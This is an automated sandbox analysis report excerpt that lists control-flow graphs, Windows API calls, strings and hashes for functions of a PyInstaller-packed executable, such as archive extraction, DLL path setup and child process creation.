                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _fread_nolock$Message
                                                                                          • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                          • API String ID: 677216364-1384898525
                                                                                          • Opcode ID: a6da9fc0af2ad67e63f89aa39b072a96458758f116bdca80824d6b80883f6e71
                                                                                          • Instruction ID: 09ab04413a483b1c6dba054ba7534f771a1b0ea49e9269119024ec72b33df180
                                                                                          • Opcode Fuzzy Hash: a6da9fc0af2ad67e63f89aa39b072a96458758f116bdca80824d6b80883f6e71
                                                                                          • Instruction Fuzzy Hash: A25168B1A0D602C6EB14FB28E55017977A0EF88B94B958536DE0CC7BA9DE7CE440CB48

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 266 7ff647771000-7ff6477739d6 call 7ff647780060 call 7ff647780058 call 7ff6477787b0 call 7ff647780058 call 7ff64777bd60 call 7ff6477853f0 call 7ff647785ff8 call 7ff647771eb0 284 7ff6477739dc-7ff6477739ec call 7ff647773ed0 266->284 285 7ff647773b7f 266->285 284->285 290 7ff6477739f2-7ff647773a05 call 7ff647773da0 284->290 287 7ff647773b84-7ff647773ba4 call 7ff64777bdc0 285->287 290->285 294 7ff647773a0b-7ff647773a32 call 7ff647777b70 290->294 297 7ff647773a74-7ff647773a9c call 7ff647778050 call 7ff647771cb0 294->297 298 7ff647773a34-7ff647773a43 call 7ff647777b70 294->298 309 7ff647773b4d-7ff647773b5e 297->309 310 7ff647773aa2-7ff647773ab8 call 7ff647771cb0 297->310 298->297 303 7ff647773a45-7ff647773a4b 298->303 305 7ff647773a4d-7ff647773a55 303->305 306 7ff647773a57-7ff647773a71 call 7ff64778507c call 7ff647778050 303->306 305->306 306->297 311 7ff647773bb2-7ff647773bb5 309->311 312 7ff647773b60-7ff647773b67 309->312 325 7ff647773aba-7ff647773ad2 call 7ff647772b30 310->325 326 7ff647773ad7-7ff647773ada 310->326 315 7ff647773bcb-7ff647773be3 call 7ff647778be0 311->315 316 7ff647773bb7-7ff647773bbd 311->316 312->311 317 7ff647773b69-7ff647773b71 call 7ff647778980 312->317 334 7ff647773be5-7ff647773bec 315->334 335 7ff647773bee-7ff647773bf5 SetDllDirectoryW 315->335 320 7ff647773bfb-7ff647773c08 call 7ff647776df0 316->320 321 7ff647773bbf-7ff647773bc9 316->321 336 7ff647773ba5-7ff647773ba8 call 7ff6477714f0 317->336 337 7ff647773b73 317->337 341 7ff647773c0a-7ff647773c17 call 7ff647776aa0 320->341 342 7ff647773c53-7ff647773c58 call 7ff647776d70 320->342 321->315 321->320 325->285 326->309 328 7ff647773adc-7ff647773af3 call 7ff647773fe0 326->328 344 7ff647773afa-7ff647773b26 call 7ff6477782c0 328->344 345 7ff647773af5-7ff647773af8 328->345 340 7ff647773b7a call 7ff647772b30 334->340 335->320 349 7ff647773bad-7ff647773bb0 336->349 337->340 340->285 341->342 357 7ff647773c19-7ff647773c28 call 7ff647776600 341->357 352 7ff647773c5d-7ff647773c60 342->352 344->309 360 7ff647773b28-7ff647773b30 call 7ff64778028c 344->360 350 7ff647773b35-7ff647773b4b call 7ff647772b30 345->350 349->285 349->311 350->285 355 7ff647773d06-7ff647773d15 call 7ff6477734c0 352->355 356 7ff647773c66-7ff647773c70 352->356 355->285 371 7ff647773d1b-7ff647773d74 call 7ff647778950 call 7ff647777fe0 call 7ff647777b70 call 7ff647773620 call 7ff647778090 call 7ff647776850 call 7ff647776d70 355->371 361 7ff647773c73-7ff647773c7d 356->361 369 7ff647773c2a-7ff647773c36 call 7ff647776580 357->369 370 7ff647773c49-7ff647773c4e call 7ff647776850 357->370 360->350 366 7ff647773c86-7ff647773c88 361->366 367 7ff647773c7f-7ff647773c84 361->367 373 7ff647773c8a-7ff647773cad call 7ff647771ef0 366->373 374 7ff647773cd1-7ff647773d01 call 7ff647773620 call 7ff647773460 call 7ff647773610 call 7ff647776850 call 7ff647776d70 366->374 367->361 367->366 369->370 385 7ff647773c38-7ff647773c47 call 7ff647776c40 369->385 370->342 409 7ff647773d76-7ff647773d7d call 7ff647777d50 371->409 410 7ff647773d82-7ff647773d85 call 7ff647771e80 371->410 373->285 384 7ff647773cb3-7ff647773cbd 373->384 374->287 388 7ff647773cc0-7ff647773ccf 384->388 385->352 388->374 388->388 409->410 413 7ff647773d8a-7ff647773d8c 410->413 413->287
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF647773ED0: GetModuleFileNameW.KERNEL32(?,00007FF6477739EA), ref: 00007FF647773F01
                                                                                          • SetDllDirectoryW.KERNEL32 ref: 00007FF647773BF5
                                                                                            • Part of subcall function 00007FF647777B70: GetEnvironmentVariableW.KERNEL32(00007FF647773A1F), ref: 00007FF647777BAA
                                                                                            • Part of subcall function 00007FF647777B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF647777BC7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                          • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                          • API String ID: 2344891160-1544818733
                                                                                          • Opcode ID: f3fad58325455d3d90bd4a6379e80876c9f26f7da2c623cdf89e881a159dc67d
                                                                                          • Instruction ID: 6b2a8aebc80c68f5564dd736ccc4a6158b0ae3d90eeb226d3713d2e402d5bdd6
                                                                                          • Opcode Fuzzy Hash: f3fad58325455d3d90bd4a6379e80876c9f26f7da2c623cdf89e881a159dc67d
                                                                                          • Instruction Fuzzy Hash: 49B18C61A1D683C1FA64BB21D8912BD6391FF95B84FC00136EE5DC76AAEF2CF5048748

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                          • String ID: CreateProcessW$Error creating child process!
                                                                                          • API String ID: 2895956056-3524285272
                                                                                          • Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                          • Instruction ID: f57af56f6768c6470fa9a252ffd502eb97c4189c4698ff0a20a9194aafbcd6e2
                                                                                          • Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                          • Instruction Fuzzy Hash: 03413371A0CB81C5EA20BB64E4552AAB361FF953A4F900735EAAD83BE5DF7CD044CB04

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 507 7ff647771050-7ff6477710ab call 7ff64777b5e0 510 7ff6477710ad-7ff6477710d2 call 7ff647772b30 507->510 511 7ff6477710d3-7ff6477710eb call 7ff647785090 507->511 516 7ff6477710ed-7ff647771104 call 7ff647772890 511->516 517 7ff647771109-7ff647771119 call 7ff647785090 511->517 522 7ff64777126c-7ff6477712a0 call 7ff64777b2c0 call 7ff64778507c * 2 516->522 523 7ff64777111b-7ff647771132 call 7ff647772890 517->523 524 7ff647771137-7ff647771147 517->524 523->522 526 7ff647771150-7ff647771175 call 7ff6477805dc 524->526 533 7ff64777117b-7ff647771185 call 7ff647780350 526->533 534 7ff64777125e 526->534 533->534 541 7ff64777118b-7ff647771197 533->541 537 7ff647771264 534->537 537->522 542 7ff6477711a0-7ff6477711c8 call 7ff647779a90 541->542 545 7ff6477711ca-7ff6477711cd 542->545 546 7ff647771241-7ff64777125c call 7ff647772b30 542->546 547 7ff64777123c 545->547 548 7ff6477711cf-7ff6477711d9 545->548 546->537 547->546 550 7ff6477711db-7ff6477711e8 call 7ff647780d1c 548->550 551 7ff647771203-7ff647771206 548->551 557 7ff6477711ed-7ff6477711f0 550->557 554 7ff647771208-7ff647771216 call 7ff64777cb40 551->554 555 7ff647771219-7ff64777121e 551->555 554->555 555->542 556 7ff647771220-7ff647771223 555->556 559 7ff647771237-7ff64777123a 556->559 560 7ff647771225-7ff647771228 556->560 561 7ff6477711f2-7ff6477711fc call 7ff647780350 557->561 562 7ff6477711fe-7ff647771201 557->562 559->537 560->546 564 7ff64777122a-7ff647771232 560->564 561->555 561->562 562->546 564->526
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                          • API String ID: 2030045667-2813020118
                                                                                          • Opcode ID: fdd47bc7a99246921f848def4a8063c601e7f2ac33117d7d556e731015f11fda
                                                                                          • Instruction ID: 788ca809ae0efccf153f11124ad5c363bd53347da9a8cc6204ee622a5027af7b
                                                                                          • Opcode Fuzzy Hash: fdd47bc7a99246921f848def4a8063c601e7f2ac33117d7d556e731015f11fda
                                                                                          • Instruction Fuzzy Hash: 5551BA62B0D682C5EA20BB51E4503BA6290FB85BD8FD84535EE4DC7BA5EE3CF505C708

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF64778F66A,?,?,-00000018,00007FF64778B417,?,?,?,00007FF64778B30E,?,?,?,00007FF647786552), ref: 00007FF64778F44C
                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF64778F66A,?,?,-00000018,00007FF64778B417,?,?,?,00007FF64778B30E,?,?,?,00007FF647786552), ref: 00007FF64778F458
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeLibraryProc
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3013587201-537541572
                                                                                          • Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                          • Instruction ID: eb5f2bd78b1cb5ad016909dc5eacf470d214809793c07ab415d286a2af44252d
                                                                                          • Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                          • Instruction Fuzzy Hash: B7410561B1DA02C1FA15FB16E80457A2391BF49BA0FDA4536DD0DD7794EE3CE449C308

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 664 7ff64778c11c-7ff64778c142 665 7ff64778c144-7ff64778c158 call 7ff6477855a4 call 7ff6477855c4 664->665 666 7ff64778c15d-7ff64778c161 664->666 684 7ff64778c54e 665->684 668 7ff64778c537-7ff64778c543 call 7ff6477855a4 call 7ff6477855c4 666->668 669 7ff64778c167-7ff64778c16e 666->669 686 7ff64778c549 call 7ff64778afa4 668->686 669->668 671 7ff64778c174-7ff64778c1a2 669->671 671->668 674 7ff64778c1a8-7ff64778c1af 671->674 678 7ff64778c1b1-7ff64778c1c3 call 7ff6477855a4 call 7ff6477855c4 674->678 679 7ff64778c1c8-7ff64778c1cb 674->679 678->686 682 7ff64778c1d1-7ff64778c1d7 679->682 683 7ff64778c533-7ff64778c535 679->683 682->683 688 7ff64778c1dd-7ff64778c1e0 682->688 687 7ff64778c551-7ff64778c568 683->687 684->687 686->684 688->678 691 7ff64778c1e2-7ff64778c207 688->691 693 7ff64778c209-7ff64778c20b 691->693 694 7ff64778c23a-7ff64778c241 691->694 697 7ff64778c232-7ff64778c238 693->697 698 7ff64778c20d-7ff64778c214 693->698 695 7ff64778c243-7ff64778c26b call 7ff64778dcbc call 7ff64778b00c * 2 694->695 696 7ff64778c216-7ff64778c22d call 7ff6477855a4 call 7ff6477855c4 call 7ff64778afa4 694->696 727 7ff64778c288-7ff64778c2b3 call 7ff64778c944 695->727 728 7ff64778c26d-7ff64778c283 call 7ff6477855c4 call 7ff6477855a4 695->728 725 7ff64778c3c0 696->725 699 7ff64778c2b8-7ff64778c2cf 697->699 698->696 698->697 702 7ff64778c2d1-7ff64778c2d9 699->702 703 7ff64778c34a-7ff64778c354 call 7ff64779408c 699->703 702->703 706 7ff64778c2db-7ff64778c2dd 702->706 716 7ff64778c3de 703->716 717 7ff64778c35a-7ff64778c36f 703->717 706->703 710 7ff64778c2df-7ff64778c2f5 706->710 710->703 714 7ff64778c2f7-7ff64778c303 710->714 714->703 721 7ff64778c305-7ff64778c307 714->721 723 7ff64778c3e3-7ff64778c403 ReadFile 716->723 717->716 719 7ff64778c371-7ff64778c383 GetConsoleMode 717->719 719->716 724 7ff64778c385-7ff64778c38d 719->724 721->703 726 7ff64778c309-7ff64778c321 721->726 729 7ff64778c409-7ff64778c411 723->729 730 7ff64778c4fd-7ff64778c506 GetLastError 723->730 724->723 732 7ff64778c38f-7ff64778c3b1 ReadConsoleW 724->732 735 7ff64778c3c3-7ff64778c3cd call 7ff64778b00c 725->735 726->703 736 7ff64778c323-7ff64778c32f 726->736 727->699 728->725 729->730 738 7ff64778c417 729->738 733 7ff64778c523-7ff64778c526 730->733 734 7ff64778c508-7ff64778c51e call 7ff6477855c4 call 7ff6477855a4 730->734 740 7ff64778c3d2-7ff64778c3dc 732->740 741 7ff64778c3b3 GetLastError 732->741 745 7ff64778c3b9-7ff64778c3bb call 7ff647785538 733->745 746 7ff64778c52c-7ff64778c52e 733->746 734->725 735->687 736->703 744 7ff64778c331-7ff64778c333 736->744 748 7ff64778c41e-7ff64778c433 738->748 740->748 741->745 744->703 753 7ff64778c335-7ff64778c345 744->753 745->725 746->735 748->735 749 7ff64778c435-7ff64778c440 748->749 755 7ff64778c442-7ff64778c45b call 7ff64778bd34 749->755 756 7ff64778c467-7ff64778c46f 749->756 753->703 764 7ff64778c460-7ff64778c462 755->764 760 7ff64778c471-7ff64778c483 756->760 761 7ff64778c4eb-7ff64778c4f8 call 7ff64778bb74 756->761 765 7ff64778c4de-7ff64778c4e6 760->765 766 7ff64778c485 760->766 761->764 764->735 765->735 768 7ff64778c48a-7ff64778c491 766->768 769 7ff64778c493-7ff64778c497 768->769 770 7ff64778c4cd-7ff64778c4d8 768->770 771 7ff64778c4b3 769->771 772 7ff64778c499-7ff64778c4a0 769->772 770->765 774 7ff64778c4b9-7ff64778c4c9 771->774 772->771 773 7ff64778c4a2-7ff64778c4a6 772->773 773->771 775 7ff64778c4a8-7ff64778c4b1 773->775 774->768 776 7ff64778c4cb 774->776 775->774 776->765
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
                                                                                          • Instruction ID: 7b9ffe765aa3f55515a358817d05a0e89329837dbde1cad0c923d15891ae2ded
                                                                                          • Opcode Fuzzy Hash: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
                                                                                          • Instruction Fuzzy Hash: 30C1F222A0C782C1EB60BB55D4442BD7F51EF90B90F9A4271EE4E87791CE7CE84D8709

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                          • String ID:
                                                                                          • API String ID: 995526605-0
                                                                                          • Opcode ID: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
                                                                                          • Instruction ID: 7b616481a352a8042df72610379037832fc54f8dd1199bc0b8e3b6d7f4b44dbd
                                                                                          • Opcode Fuzzy Hash: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
                                                                                          • Instruction Fuzzy Hash: 65215331A0C642C2EB50BB99F44453AA3A0FF957E0F900235DEAD87AE4DF6CE4448754

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00007FF647778660: GetCurrentProcess.KERNEL32 ref: 00007FF647778680
                                                                                            • Part of subcall function 00007FF647778660: OpenProcessToken.ADVAPI32 ref: 00007FF647778691
                                                                                            • Part of subcall function 00007FF647778660: GetTokenInformation.KERNELBASE ref: 00007FF6477786B6
                                                                                            • Part of subcall function 00007FF647778660: GetLastError.KERNEL32 ref: 00007FF6477786C0
                                                                                            • Part of subcall function 00007FF647778660: GetTokenInformation.KERNELBASE ref: 00007FF647778700
                                                                                            • Part of subcall function 00007FF647778660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64777871C
                                                                                            • Part of subcall function 00007FF647778660: CloseHandle.KERNEL32 ref: 00007FF647778734
                                                                                          • LocalFree.KERNEL32(00000000,00007FF647773B6E), ref: 00007FF647778A0C
                                                                                          • LocalFree.KERNEL32 ref: 00007FF647778A15
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                          • API String ID: 6828938-1817031585
                                                                                          • Opcode ID: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
                                                                                          • Instruction ID: 8b04a5a3dc3949492ba0d90060a74647276fba107981e3fe7c925e6b6ac54336
                                                                                          • Opcode Fuzzy Hash: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
                                                                                          • Instruction Fuzzy Hash: 0C213A71A1DB86C1FA14BB20E8456FA6261EF68780FC44632ED4ED37A6DE3CF5448644

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 925 7ff64778d620-7ff64778d645 926 7ff64778d913 925->926 927 7ff64778d64b-7ff64778d64e 925->927 930 7ff64778d915-7ff64778d925 926->930 928 7ff64778d650-7ff64778d682 call 7ff64778aed8 927->928 929 7ff64778d687-7ff64778d6b3 927->929 928->930 932 7ff64778d6be-7ff64778d6c4 929->932 933 7ff64778d6b5-7ff64778d6bc 929->933 935 7ff64778d6d4-7ff64778d6e9 call 7ff64779408c 932->935 936 7ff64778d6c6-7ff64778d6cf call 7ff64778c9e0 932->936 933->928 933->932 940 7ff64778d6ef-7ff64778d6f8 935->940 941 7ff64778d803-7ff64778d80c 935->941 936->935 940->941 942 7ff64778d6fe-7ff64778d702 940->942 943 7ff64778d80e-7ff64778d814 941->943 944 7ff64778d860-7ff64778d885 WriteFile 941->944 945 7ff64778d713-7ff64778d71e 942->945 946 7ff64778d704-7ff64778d70c call 7ff647784a00 942->946 949 7ff64778d816-7ff64778d819 943->949 950 7ff64778d84c-7ff64778d85e call 7ff64778d0d8 943->950 947 7ff64778d890 944->947 948 7ff64778d887-7ff64778d88d GetLastError 944->948 952 7ff64778d72f-7ff64778d744 GetConsoleMode 945->952 953 7ff64778d720-7ff64778d729 945->953 946->945 955 7ff64778d893 947->955 948->947 956 7ff64778d838-7ff64778d84a call 7ff64778d2f8 949->956 957 7ff64778d81b-7ff64778d81e 949->957 972 7ff64778d7f0-7ff64778d7f7 950->972 962 7ff64778d74a-7ff64778d750 952->962 963 7ff64778d7fc 952->963 953->941 953->952 965 7ff64778d898 955->965 956->972 958 7ff64778d8a4-7ff64778d8ae 957->958 959 7ff64778d824-7ff64778d836 call 7ff64778d1dc 957->959 966 7ff64778d8b0-7ff64778d8b5 958->966 967 7ff64778d90c-7ff64778d911 958->967 959->972 970 7ff64778d756-7ff64778d759 962->970 971 7ff64778d7d9-7ff64778d7eb call 7ff64778cc60 962->971 963->941 973 7ff64778d89d 965->973 974 7ff64778d8e3-7ff64778d8ed 966->974 975 7ff64778d8b7-7ff64778d8ba 966->975 967->930 977 7ff64778d764-7ff64778d772 970->977 978 7ff64778d75b-7ff64778d75e 970->978 971->972 972->965 973->958 982 7ff64778d8ef-7ff64778d8f2 974->982 983 7ff64778d8f4-7ff64778d903 974->983 980 7ff64778d8d3-7ff64778d8de call 7ff647785580 975->980 981 7ff64778d8bc-7ff64778d8cb 975->981 984 7ff64778d7d0-7ff64778d7d4 977->984 985 7ff64778d774 977->985 978->973 978->977 980->974 981->980 982->926 982->983 983->967 984->955 987 7ff64778d778-7ff64778d78f call 7ff647794158 985->987 991 7ff64778d791-7ff64778d79d 987->991 992 7ff64778d7c7-7ff64778d7cd GetLastError 987->992 993 7ff64778d79f-7ff64778d7b1 call 7ff647794158 991->993 994 7ff64778d7bc-7ff64778d7c3 991->994 992->984 993->992 998 7ff64778d7b3-7ff64778d7ba 993->998 994->984 996 7ff64778d7c5 994->996 996->987 998->994
                                                                                          APIs
                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF64778D60B), ref: 00007FF64778D73C
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF64778D60B), ref: 00007FF64778D7C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorLastMode
                                                                                          • String ID:
                                                                                          • API String ID: 953036326-0
                                                                                          • Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                          • Instruction ID: a66a5459e5c23c64129d653912540dada0fda50ac5e50ebb0c8d8b5ed7e6c2f6
                                                                                          • Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                          • Instruction Fuzzy Hash: 2E91C172F0C652C9F760BF65D4446BD2BA0EB58B98F958139DE0E97A84DF38E481C308
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
